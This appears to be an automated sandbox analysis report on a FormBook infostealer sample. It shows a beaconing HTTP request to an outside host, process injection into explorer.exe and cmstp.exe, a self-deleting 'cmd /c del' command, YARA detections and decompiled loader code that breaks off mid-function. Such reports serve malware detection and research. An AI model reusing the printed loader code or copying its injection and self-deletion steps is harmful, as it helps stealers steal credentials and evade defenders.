                                                                        Apr 8, 2021 13:02:09.097908020 CEST5407OUTGET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.lewishackney.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:02:09.276810884 CEST5410INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:02:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "605db497-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: LWlcpDjYIQ.exe PID: 5524 Parent PID: 5708

                                                                        General

                                                                        Start time:13:00:12
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206058 bytes
                                                                        MD5 hash:91523F8D438585534D9466432CC4665D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: LWlcpDjYIQ.exe PID: 3664 Parent PID: 5524

                                                                        General

                                                                        Start time:13:00:13
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206058 bytes
                                                                        MD5 hash:91523F8D438585534D9466432CC4665D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 3664

                                                                        General

                                                                        Start time:13:00:18
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: cmstp.exe PID: 5796 Parent PID: 3388

                                                                        General

                                                                        Start time:13:00:32
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                        Imagebase:0x220000
                                                                        File size:82944 bytes
                                                                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Chronological Activities

                                                                        Analysis Process: cmd.exe PID: 6136 Parent PID: 5796

                                                                        General

                                                                        Start time:13:00:36
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
                                                                        Imagebase:0x9d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: conhost.exe PID: 400 Parent PID: 6136

                                                                        General

                                                                        Start time:13:00:37
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >

                                                                          Analysis Process: LWlcpDjYIQ.exe PID: 5524 Parent PID: 5708 LWlcpDjYIQ.exeCOMMON

                                                                          Executed Functions

                                                                          Function 00403166, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x42f4d0 = _t31;
				SHGetFileInfoA(0x429860, 0,  &_v356, 0x160, 0); // executed
				E004059DB("obsolete Setup", "NSIS Error");
				_t89 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403132(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\hardz\\Desktop\\LWlcpDjYIQ.exe\" ";
					DeleteFileA(_t96); // executed
					E004059DB(_t96, GetCommandLineA());
					 *0x42f420 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\hardz\\Desktop\\LWlcpDjYIQ.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M00435001;
					}
					_t43 = CharNextA(E00405513(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E00405513(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059DB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E0040351D();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x42f4b4;
											if( *0x42f4b4 != 0) {
												_t106 = E00405CEE("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CEE("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CEE("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x42f4cc;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052DB(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x42f434 == _t46) {
										L31:
										 *0x42f4cc =  *0x42f4cc | 0xffffffff;
										_v396 = E00403542();
										goto L32;
									}
									_t103 = E00405513(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x428c60 = 0x22;
											lstrcatA(0x428c60, _t89);
											lstrcatA(0x428c60, "Au_.exe");
											DeleteFileA(0x428c61);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x42f420, 0x429460, 0x400) + 0x42945a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x429460, 0x428c61, 0) != 0) {
												E00405723(0x428c61, 0);
												if("C:\\Users\\hardz\\AppData\\Local\\Temp" == 0) {
													E0040552F(0x429460);
												} else {
													E004059DB(0x429460, "C:\\Users\\hardz\\AppData\\Local\\Temp");
												}
												lstrcatA(0x428c60, "\" ");
												lstrcatA(0x428c60, _v400);
												lstrcatA(0x428c60, " _?=");
												lstrcatA(0x428c60, 0x429460);
												E004054E8(0x428c60);
												_t78 = E00405263(0x428c60, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055C8(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059DB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E004059DB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403132(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































                                                                          0x0040316f
                                                                          0x00403172
                                                                          0x00403176
                                                                          0x0040317b
                                                                          0x00403180
                                                                          0x00403187
                                                                          0x0040318d
                                                                          0x004031a3
                                                                          0x004031b3
                                                                          0x004031b8
                                                                          0x004031c3
                                                                          0x004031c9
                                                                          0x004031ce
                                                                          0x004031d0
                                                                          0x004031f6
                                                                          0x004031f6
                                                                          0x004031fc
                                                                          0x0040320a
                                                                          0x0040321e
                                                                          0x00403223
                                                                          0x00403225
                                                                          0x00403227
                                                                          0x0040322c
                                                                          0x0040322c
                                                                          0x0040323c
                                                                          0x00403242
                                                                          0x004032ab
                                                                          0x004032ab
                                                                          0x004032ad
                                                                          0x004032af
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403248
                                                                          0x0040324b
                                                                          0x00403253
                                                                          0x00403253
                                                                          0x00403256
                                                                          0x0040325b
                                                                          0x0040325d
                                                                          0x0040325d
                                                                          0x0040325e
                                                                          0x0040325e
                                                                          0x00403263
                                                                          0x00403266
                                                                          0x0040329b
                                                                          0x004032a0
                                                                          0x004032a5
                                                                          0x004032a8
                                                                          0x004032aa
                                                                          0x004032aa
                                                                          0x004032aa
                                                                          0x00000000
                                                                          0x00403268
                                                                          0x00403268
                                                                          0x00403269
                                                                          0x0040326c
                                                                          0x00403274
                                                                          0x00403277
                                                                          0x00403279
                                                                          0x00403279
                                                                          0x00403279
                                                                          0x00403277
                                                                          0x0040327c
                                                                          0x00403282
                                                                          0x0040328a
                                                                          0x0040328d
                                                                          0x0040328f
                                                                          0x0040328f
                                                                          0x0040328f
                                                                          0x0040328d
                                                                          0x00403292
                                                                          0x00403299
                                                                          0x004032b3
                                                                          0x004032b7
                                                                          0x004032c0
                                                                          0x004032c5
                                                                          0x004032c6
                                                                          0x004032cb
                                                                          0x004032cf
                                                                          0x00403332
                                                                          0x00403332
                                                                          0x00403337
                                                                          0x0040333f
                                                                          0x0040346a
                                                                          0x00403471
                                                                          0x0040348d
                                                                          0x0040349a
                                                                          0x004034a3
                                                                          0x004034a5
                                                                          0x004034a7
                                                                          0x004034a9
                                                                          0x004034ab
                                                                          0x004034ad
                                                                          0x004034af
                                                                          0x004034bf
                                                                          0x004034c1
                                                                          0x004034c3
                                                                          0x004034d0
                                                                          0x004034df
                                                                          0x004034e7
                                                                          0x004034ef
                                                                          0x004034ef
                                                                          0x004034c3
                                                                          0x004034af
                                                                          0x004034ab
                                                                          0x004034f4
                                                                          0x004034fa
                                                                          0x004034fc
                                                                          0x00403500
                                                                          0x00403500
                                                                          0x004034fc
                                                                          0x00403505
                                                                          0x0040350a
                                                                          0x0040350d
                                                                          0x0040350f
                                                                          0x0040350f
                                                                          0x00403517
                                                                          0x00403517
                                                                          0x0040334b
                                                                          0x00403352
                                                                          0x00403352
                                                                          0x004032d7
                                                                          0x00403322
                                                                          0x00403322
                                                                          0x0040332e
                                                                          0x00000000
                                                                          0x0040332e
                                                                          0x004032e0
                                                                          0x004032ed
                                                                          0x004032e4
                                                                          0x004032ea
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032ec
                                                                          0x004032ec
                                                                          0x004032ec
                                                                          0x004032f1
                                                                          0x004032f3
                                                                          0x004032f8
                                                                          0x0040335e
                                                                          0x00403366
                                                                          0x0040336c
                                                                          0x0040337b
                                                                          0x0040337d
                                                                          0x00403386
                                                                          0x00403391
                                                                          0x0040339b
                                                                          0x004033a3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004033cf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004033e5
                                                                          0x004033ee
                                                                          0x004033fa
                                                                          0x0040340a
                                                                          0x004033fc
                                                                          0x00403402
                                                                          0x00403402
                                                                          0x00403415
                                                                          0x0040341f
                                                                          0x0040342a
                                                                          0x00403431
                                                                          0x00403437
                                                                          0x0040343e
                                                                          0x00403445
                                                                          0x00403448
                                                                          0x0040344e
                                                                          0x0040344e
                                                                          0x00403445
                                                                          0x00403450
                                                                          0x00403450
                                                                          0x00403456
                                                                          0x0040345a
                                                                          0x00000000
                                                                          0x00403465
                                                                          0x004032fa
                                                                          0x004032fd
                                                                          0x00403308
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403310
                                                                          0x0040331b
                                                                          0x00403320
                                                                          0x00000000
                                                                          0x00403320
                                                                          0x00000000
                                                                          0x00403299
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040324d
                                                                          0x0040324d
                                                                          0x0040324d
                                                                          0x0040324e
                                                                          0x0040324e
                                                                          0x00000000
                                                                          0x0040324d
                                                                          0x00000000
                                                                          0x004032b1
                                                                          0x004031d8
                                                                          0x004031e4
                                                                          0x004031f0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • #17.COMCTL32 ref: 00403180
                                                                          • OleInitialize.OLE32(00000000), ref: 00403187
                                                                          • SHGetFileInfoA.SHELL32(00429860,00000000,?,00000160,00000000), ref: 004031A3
                                                                            • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,obsolete Setup,NSIS Error), ref: 004059E8
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,obsolete Setup,NSIS Error), ref: 004031C3
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031D8
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031E4
                                                                            • Part of subcall function 00403132: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00403153
                                                                          • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\LWlcpDjYIQ.exe" ), ref: 004031FC
                                                                          • GetCommandLineA.KERNEL32 ref: 00403202
                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 00403211
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000020), ref: 0040323C
                                                                          • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 00403337
                                                                          • ExitProcess.KERNEL32 ref: 00403352
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000,00000000,00000000,00000020), ref: 0040335E
                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000,00000000,00000000,00000020), ref: 00403366
                                                                          • lstrcatA.KERNEL32(00428C60,C:\Users\user\AppData\Local\Temp\), ref: 00403386
                                                                          • lstrcatA.KERNEL32(00428C60,Au_.exe,00428C60,C:\Users\user\AppData\Local\Temp\), ref: 00403391
                                                                          • DeleteFileA.KERNEL32(00428C61,00428C60,Au_.exe,00428C60,C:\Users\user\AppData\Local\Temp\), ref: 0040339B
                                                                          • GetModuleFileNameA.KERNEL32(00429460,00000400), ref: 004033B5
                                                                          • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033C7
                                                                          • CopyFileA.KERNEL32(00429460,00428C61,00000000), ref: 004033DD
                                                                          • lstrcatA.KERNEL32(00428C60,00409218,00429460,00428C61,00000000), ref: 00403415
                                                                          • lstrcatA.KERNEL32(00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 0040341F
                                                                          • lstrcatA.KERNEL32(00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 0040342A
                                                                          • lstrcatA.KERNEL32(00428C60,00429460,00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 00403431
                                                                          • CloseHandle.KERNEL32(00000000,00428C60,C:\Users\user\AppData\Local\Temp\,00428C60,00428C60,00429460,00428C60, _?=,00428C60,00000000,00428C60,00409218,00429460,00428C61,00000000), ref: 00403448
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 004034B8
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004034F4
                                                                          • ExitProcess.KERNEL32 ref: 00403517
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                          • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\LWlcpDjYIQ.exe" $ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$obsolete Setup$~nsu.tmp\
                                                                          • API String ID: 3079827372-4143920217
                                                                          • Opcode ID: 8c8cb09e11507eea63e2f083beeee93ee118921aa890babe305c7a6650db8a6b
                                                                          • Instruction ID: b2928dc65eb712516e19e911de1db687ceab521ce29b32085d2a85fb78ed52a1
                                                                          • Opcode Fuzzy Hash: 8c8cb09e11507eea63e2f083beeee93ee118921aa890babe305c7a6650db8a6b
                                                                          • Instruction Fuzzy Hash: 1791E370A48750BAD7216F619C0AB2B3E9CEF4570AF54097FF441B61D3CBBC99018A6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040531D, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 98%
                                                                          			E0040531D(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055C8(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059DB(0x42b8a8, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E0040552F(_t74);
					} else {
						lstrcatA(0x42b8a8, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x42b8a8,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E00405513( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059DB(_t72, _t77);
